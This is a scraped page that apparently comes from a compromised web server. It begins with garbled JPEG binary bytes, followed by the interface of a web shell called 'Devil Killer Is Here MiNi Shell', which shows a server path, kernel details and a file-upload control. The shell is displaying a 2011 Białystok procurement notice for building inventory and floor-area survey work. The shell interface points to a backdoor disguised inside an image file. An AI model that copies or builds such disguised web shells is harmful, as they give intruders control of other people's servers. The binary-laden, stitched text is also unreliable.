JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110607/158915-N-2011.html

<p class="kh_header"><b>Białystok: Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych w Białymstoku.</b><br>
<b>Numer ogłoszenia: 158915 - 2011; data zamieszczenia: 07.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Mienia Komunalnego , ul. gen. J. Bema 89/1, 15-370 Białystok, woj. podlaskie, tel. 085 7479457, faks 085 7479483.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych w Białymstoku  zgodnie z opisem podanym poniżej dla następujących zadań:
Zadanie nr 1
1.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Broniewskiego 12  -dz. nr 427 obręb . Powierzchnia użytkowa budynku 3058 m2. Ilość lokali mieszkalnych - 75 
2.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Broniewskiego 15  -dz. nr 411 obręb 11. Powierzchnia użytkowa budynku 1792 m2. Ilość lokali mieszkalnych - 45 
3.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Broniewskiego 17  -dz. nr 410 obręb 11. Powierzchnia użytkowa budynku 1792 m2. Ilość lokali mieszkalnych - 45 
4.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Broniewskiego 19  -dz. nr 409 obręb 11. Powierzchnia użytkowa budynku 1792 m2. Ilość lokali mieszkalnych - 45 
5.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Broniewskiego 21  -dz. nr 408 obręb 11. Powierzchnia użytkowa budynku 1791 m2. Ilość lokali mieszkalnych - 45 
6.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Broniewskiego 23  -dz. nr 407 obręb 11. Powierzchnia użytkowa budynku 1792 m2. Ilość lokali mieszkalnych - 45 

Zadanie nr 2
1)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żabiej 3  
-dz. nr 133 obręb 11. Powierzchnia użytkowa budynku 2308 m2. Ilość lokali mieszkalnych - 60 
2)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żabiej 8  
-dz. nr 183 obręb 11. Powierzchnia użytkowa budynku 2244 m2. Ilość lokali mieszkalnych - 60 
3)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żabiej 9  
-dz. nr 144 obręb 11. Powierzchnia użytkowa budynku 1454 m2. Ilość lokali mieszkalnych - 33 
4)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żabiej 12 
 -dz. nr 185 obręb 11. Powierzchnia użytkowa budynku 2250 m2. Ilość lokali mieszkalnych - 60 
5)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żabiej 14 
 -dz. nr 186 obręb 11. Powierzchnia użytkowa budynku 2258 m2. Ilość lokali mieszkalnych - 60 
6)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żytniej 11  
-dz. nr 47 obręb 11. Powierzchnia użytkowa budynku 2296 m2. Ilość lokali mieszkalnych - 60 
7)	Opracowanie dokumentacji - inwentaryzacji tech7nicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Żytniej 13  
-dz. nr 46 obręb 11. Powierzchnia użytkowa budynku 2258 m2. Ilość lokali mieszkalnych - 60 

Zadanie nr 3
1)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Warszawskiej 2  -dz. nr 363/6 obręb 17. Powierzchnia użytkowa budynku 558 m2. Ilość lokali użytkowych - 4
2)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Warszawskiej 20 -dz. nr 370 obręb 17. Powierzchnia użytkowa budynku 765 m2. Ilość lokali mieszkalnych - 12 
3)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Warszawskiej 42  -dz. nr 866/1 obręb 17. Powierzchnia użytkowa budynku 151 m2. Ilość lokali mieszkalnych - 2, lokali użytkowych - 1 
4)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Orlej 2  
-dz. nr 562/3 obręb 17. Powierzchnia użytkowa budynku 188 m2. Ilość lokali mieszkalnych - 4, garaży -3
5)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Orzeszkowej 36  - dz. nr 1133 obręb 17. Powierzchnia użytkowa budynku 1086  m2. Ilość lokali mieszkalnych - 30
6)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Biała 3  
- dz. nr 1395 obręb 11. Powierzchnia użytkowa budynku 905  m2. Ilość lokali mieszkalnych - 20, lokali użytkowych - 1 
7)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Piłsudskiego 20/3, 20/5   - dz. nr 1288/17 obręb 11. Powierzchnia użytkowa budynku 879  m2. Ilość lokali mieszkalnych - 15, garaży - 1 
8)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Nowy Świat 12  - dz. nr 1327 obręb 11. Powierzchnia użytkowa budynku 764  m2. Ilość lokali mieszkalnych - 14
9)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Nowy Świat 18  - dz. nr 1329 obręb 11. Powierzchnia użytkowa budynku 1270  m2. Ilość lokali mieszkalnych - 26, lokali użytkowych - 1
10)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Legionowa 2 
- dz. nr 1434 obręb 11. Powierzchnia użytkowa budynku 1222  m2. Ilość lokali mieszkalnych - 16, lokali użytkowych - 3 
11)	Opracowanie dokumentacji - inwentaryzacji technicznej obiektów położonych 
przy ul. Legionowa 2/1  - dz. nr 1435 obręb 11. Powierzchnia użytkowa budynku 1156  m2. Ilość lokali mieszkalnych - 29, lokali użytkowych - 1 

Zadanie nr 4
1)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Al. Jana Pawła II 58  -dz. nr 1677/10 obręb 2. Powierzchnia użytkowa budynku 548 m2. Ilość lokali mieszkalnych - 12 
2)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych 
przy ul. Jarzębinowej 6  -dz. nr 704/10 obręb 2. Powierzchnia użytkowa budynku 2863 m2. Ilość lokali mieszkalnych - 56
3)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Przejazd 2  -dz. nr 1268 obręb 11	. Powierzchnia użytkowa budynku 642 m2. Ilość lokali mieszkalnych - 14 
4)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych 
przy ul. Waryńskiego 2 -dz. nr 1300/6 obręb 11. Powierzchnia użytkowa budynku 679 m2. Ilość lokali mieszkalnych - 9, ilość lokali użytkowych - 5
5)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Antoniuk Fabryczny 56 - dz. nr 702/11 obręb 2. Powierzchnia użytkowa budynku 1618  m2. Ilość lokali mieszkalnych - 35, lokali użytkowych - 1 
6)	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Pułaskiego 87- dz. nr 773 obręb 7. Powierzchnia użytkowa budynku 1764  m2. Ilość lokali mieszkalnych - 31, lokali użytkowych - 1 

Zadanie nr 5
1.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów inwentaryzacyjnych powierzchni użytkowej obiektów położonych przy ul. Lipowej 16  -dz. nr 1287 obręb 11. Powierzchnia użytkowa budynku 7721 m2. Ilość lokali mieszkalnych - 142, lokali użytkowych - 8 
2.	Opracowanie dokumentacji - inwentaryzacji technicznej oraz operatów iwentaryzacyjnych powierzchni użytkowej obiektów położonych 
przy ul. Skłodowskiej 5 - dz. nr 1815 obręb 11. Powierzchnia użytkowa budynku 1663  m2. Ilość lokali mieszkalnych - 40
3.	Opracowanie dokumentacji w celu uzyskania zaświadczenia samodzielności lokali użytkowych garaży: 
- przy ul. Przytorowej, boks 223, Nr działki 782/2 obręb 12
- przy ul. Murarskiej:
-           Zespół III garaż nr 5, działka 69/11, obręb  10
-	Zespół V garaże nr  5,8,9,10 działka 69/9, obręb 10
-	Zespół VII garaż nr 9, działka 69/7, obręb 10
-	Zespół VIII garaż nr 11, działka 69/6, obręb 10
-	Zespół IX garaż nr 11, działka 69/5 obręb 10

2.   Inwentaryzacja techniczna obiektów powinna zawierać:
1)	opis techniczny obiektu zawierający charakterystykę użytych materiałów, konstrukcji budynku, detali konstrukcyjnych i architektonicznych, funkcji obiektu i jego wyposażenia oraz innych elementów zagospodarowania terenu tj. budynków towarzyszących, ogrodzeń, przyłączy, istniejącej infrastruktury technicznej 
- w/w elementy powinny być przedstawione zarówno w formie opisowej, graficznej 
jak i fotograficznej (w formie cyfrowej),
2)	opisy techniczne branżowe,
a)	instalacji sanitarnej zawierający informacje o zastosowanych technologiach 
i materiałach  (m. in. typ zastosowanych rurociągów, izolacji, grzejników, zaworów itp.),
3)	plan sytuacyjny - zagospodarowanie działki w skali 1:500 na mapie zasadniczej 
do celów opiniodawczych,
4)	rzuty wszystkich kondygnacji  w skali 1:100
5)	rzut więźby dachowej skali 1:100
6)	rzut dachu w skali 1:100
7)	przekroje budynku w miejscach charakterystycznych , takich jak klatki schodowe, obszar poza klatka schodową i w innych istotnie różniących się od siebie miejscach, np. w szerokości budynku, wysokości kondygnacji, kształtu dachu)
8)	elewacje - dokumentacja fotograficzna,
9)	charakterystyczne detale - dokumentacja fotograficzna,
10)	umiejscowienie przewodów kominowych,
11)	plany sytuacyjne istniejących instalacji sanitarnych uwidocznione na oddzielnych rzutach poszczególnych kondygnacji w skali 1:100
a)	usytuowanie przyłączy (wejścia do budynku),woda zimna, woda ciepła, kanalizacja (leżaki, piony) z podaniem średnic rur,
b)	instalacja wod.kan.: leżaki, piony ( z uwzględnieniem średnicy rur i rozmiaru przyborów sanitarnych),
c)	instalacja CO: leżaki, piony (uwzględniając średnice rur), grzejniki (typ grzejników i wielkość) i odpowietrzenia,
d)	instalacja gazowa: leżaki, piony, instalacja lokalowa z odbiornikami gazu, umiejscowienie gazomierzy,
12)	instalacja elektryczna:
a)	schemat zasilania i instalacji elektrycznych zawierający:
-linię zasilającą (skąd zasilanie; typ i przekrój)
-złącze (wielkość zabezpieczenia)
-WLZ (typ i przekrój)
-zabezpieczenia przedlicznikowe (lokalizacja i wielkość zabezpieczenia)
-WLZ do lokali i administracyjne (typ i przekrój)
-układ pomiarowy (lokalizacja)
-obwody odbiorcze (ilość, identyfikacja obwodów gniazdkowych 
i oświetleniowych 
-schemat obwodów administracyjnych
-schemat instalacji odgromowej na rzucie dachu
-informacja o instalacji domofonowej, telewizji kablowej i telefonicznej zawarta 
w opisie technicznym
13)	operat inwentaryzacyjny powierzchni powinien zawierać:
a)	inwentaryzację obejmującą pomiar wszystkich lokali z dokładnością do dwóch miejsc po przecinku wraz z pomieszczeniami do nich przynależnymi 
z uwzględnieniem wykonanych adaptacji części nieruchomości wspólnych,
b)	ustalona powierzchnia użytkowa nieruchomości winna być sumą powierzchni użytkowych poszczególnych lokali mieszkalnych i użytkowych,
c)	ustalić, aby suma wykazanych liczników i przyjęty mianownik zamykała 
się do jedności, 
d)	zebrać we własnym zakresie dokumentację potrzebną do wykonania przedmiotu zamówienia, 
e)	zadbać, aby dokumentacja sporządzona dla nieruchomości zawierała: 
-rysunki rzutów kondygnacji budynku z oznaczeniem rodzajów pomieszczeń, wszystkich lokali do wyodrębnienia oraz pomieszczeń przynależnych 
do lokali, oznaczenie piwnic przynależnych zgodnie z numeracją lokali
-na rzutach kondygnacji każdy oddzielny lokal winien być zaznaczony 
w sposób widoczny kolorem (każdy innym) w formie obrysu, zgodnie 
z aktualnymi wymogami organu architektonicznego; powierzchnie wspólne winny być zaznaczone (obwiedzione) kolorem żółtym
-na poszczególnych rzutach winna znajdować się legenda zastosowanych oznaczeń graficznych
-wykaz powierzchni lokali, pomieszczeń przynależnych 
-zestawienie powierzchni lokali, pomieszczeń przynależnych
-rozliczenie udziałów w działce gruntu i częściach wspólnych budynku przypadających na poszczególne lokale, przed i po adaptacji części nieruchomości wspólnych w przypadku ich wystąpienia
-powierzchnie lokali po pomiarach inwentaryzacyjnych winny być ustalone przy zastosowaniu definicji podanych w art. 2 ust. 1 pkt 7 oraz art. 2 ust. 2 ustawy z dnia 21 czerwca 2001r. o ochronie praw lokatorów, mieszkaniowym zasobie gminy i o zmianie Kodeksu cywilnego (tekst jednolity Dz. U. z 2005r. Nr 31, poz. 266 z późn. zmianami) zgodnie z normą PN-70/B-02365
-dokumentacja winna być sporządzona zgodnie z normami:
- PN-B-01025:2004 - Rysunek budowlany. Oznaczenia graficzne na rysunkach architektoniczno-budowlanych uwzględniając odniesienia do pozostałych  norm w niej zawartych
- PN-B-01029:2000 - Rysunek budowlany. Zasady wymiarowania 
na rysunkach architektoniczno- budowlanych
- PN-B-01027:2002 - Rysunek budowlany. Oznaczenia graficzne stosowane 
w projektach zagospodarowania działki lub terenu
14) W przypadku zadania nr 5 punkt 3 - wymienione garaże należy umiejscowić 
na odpowiednim rzucie wraz z wykonaniem pomiarów, opisem konstrukcji - opracowanie ma odpowiadać warunkom art. 2 ust. 5 ustawy z dnia 24 czerwca 1994r. o własności lokali w celu uzyskania zaświadczenia o samodzielności lokali. W przypadku zadania nr 3 budynku 
przy ul. Legionowej 2/1 należy wykonać jedynie inwentaryzację techniczną bez operatu inwentaryzacyjnego powierzchni.
15) Uwaga! W przypadku odmowy udostępnienia lokalu przez jego właściciela 
do inwentaryzacji zostanie przyjęta powierzchnia lokalu wyspecyfikowana w akcie notarialnym, którego egzemplarz jest w posiadaniu właściwej administracji. W przypadku lokali komunalnych należy powiadomić zamawiającego o braku możliwości wykonania pomiarów w lokalu. Dokumentacja musi być zgodna z przepisami techniczno - budowlanymi, Polskimi Normami i zasadami wiedzy technicznej. Dokumentacja inwentaryzacyjna w całości musi być dostarczona zamawiającemu : a) w wersji drukowanej - 4 kpl. b) w wersji elektronicznej - 1 kpl. (PDF).
16) Do dokumentacji należy dołączyć:
 - do każdej inwentaryzacji poszczególnych instalacji należy dołączyć kserokopię mapy sytuacyjno-wysokościowej (uwzględniając uzbrojenie terenu) z kolorystycznym oznaczeniem przebiegu danej instalacji,
-   kserokopie uprawnień budowlanych:
      -  w specjalności konstrukcyjno-budowlanej uprawniających do projektowania lub   uprawnień architektonicznych
      -  uprawnienia budowlane do projektowania w specjalności instalacyjnej w zakresie    instalacji i urządzeń elektrycznych, sanitarnych i gazowych 
       -  kserokopię aktualnego wpisu do Okręgowej Izby Inżynierów Budownictwa lub    Okręgowej Izby Architektów; wszystkie dokumenty składane przez Wykonawcę powinny być potwierdzone przez niego za zgodność z oryginałem,
-    oryginalne potwierdzenie dokonania pomiaru każdego lokalu w postaci listy podpisów      osób udostępniających lokale.
Wzór listy podpisów stanowi załącznik nr 2 do Umowy.

3.	Wymaga się udzielenia 5 letniej rękojmi na wykonywany przedmiot zamówienia - dotyczy zadania nr 1, 2, 3, 4 i 5..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.25.10.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 120.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wskazać do uczestnictwa w wykonaniu niniejszego zamówienia następujące osoby wraz z informacjami na temat ich kwalifikacji zawodowych, zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami, tj.:
a)	projektant branży architektonicznej - uprawnienia projektowe w specjalności architektonicznej bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane  - dotyczy zadania nr 1, 2, 3, 4 i 5,
b)	projektant branży elektroenergetycznej - uprawnienia projektowe w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane - dotyczy zadania nr 1, 2, 3, 4 i 5,
c)	projektant branży instalacyjnej - uprawnienia projektowe w specjalności instalacyjnej 
w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów, niezbędne do wykonania przedmiotu zamówienia, wymagane przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane - dotyczy zadania nr 1, 2, 3, 4 i 5,
d)	rzeczoznawca majątkowy - uprawnienia zawodowe w zakresie szacowania nieruchomości - dotyczy zadania nr 1, 2, 3, 4 i 5;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego:
1)	każdy wykonawca zobowiązany jest złożyć oddzielnie dokumenty określone w rozdziale VI SIWZ pkt 3 ppkt 1 i 2, 
2)	dokumenty określone w rozdziale VI SIWZ pkt 2 ppkt 1 i 2 winien złożyć co najmniej jeden 
z wykonawców wspólnie ubiegających się o udzielenie zamówienia,
3)	oświadczenie o spełnieniu warunków udziału w postępowaniu określone w rozdziale VI SIWZ pkt 1 składa pełnomocnik wykonawców wspólnie ubiegających się o udzielenie zamówienia w ich imieniu bądź każdy z wykonawców oddzielnie.
7.	Zamawiający wymaga także załączenia do oferty innych dokumentów:
